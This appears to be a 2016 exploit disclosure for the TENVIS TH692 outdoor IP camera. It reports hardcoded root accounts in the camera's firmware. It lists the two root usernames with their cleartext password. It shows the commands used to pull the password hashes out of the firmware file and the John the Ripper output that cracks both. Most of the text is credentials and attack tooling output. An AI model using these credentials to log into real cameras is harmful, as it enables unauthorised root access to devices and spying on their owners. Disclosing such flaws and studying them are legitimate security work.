37 lines
No EOL
1.3 KiB
Text
37 lines
No EOL
1.3 KiB
Text
Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials
|
|
Date: 4/16/2016
|
|
Exploit Author: DLY
|
|
Vendor: TENVIS Technology Co., Ltd
|
|
Product: TH692- Outdoor P2P HD Waterproof IP Camera
|
|
Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html
|
|
Affected version: TH692C-V. 16.1.16.1.1.4
|
|
firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov
|
|
|
|
user: Mroot
|
|
pass:cat1029
|
|
user:Wproot
|
|
pass: cat1029
|
|
|
|
root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root
|
|
rootpath
|
|
rootfs crc %lx
|
|
------------------start upgrade rootfs------------------
|
|
------------------end upgrade rootfs------------------
|
|
bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)
|
|
nfsroot
|
|
7root
|
|
Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot
|
|
k01000100 rootbox nohelp info
|
|
root::0:
|
|
Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
|
|
Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh
|
|
nfsroot
|
|
pivot_root
|
|
xswitch_root
|
|
chroot
|
|
nfsroot
|
|
root@kali:~# john --show ipcamhashes
|
|
Mroot:cat1029:0:0::/root:/bin/sh
|
|
Wproot:cat1029:0:0::/root:/bin/sh
|
|
|
|
2 password hashes cracked, 0 left |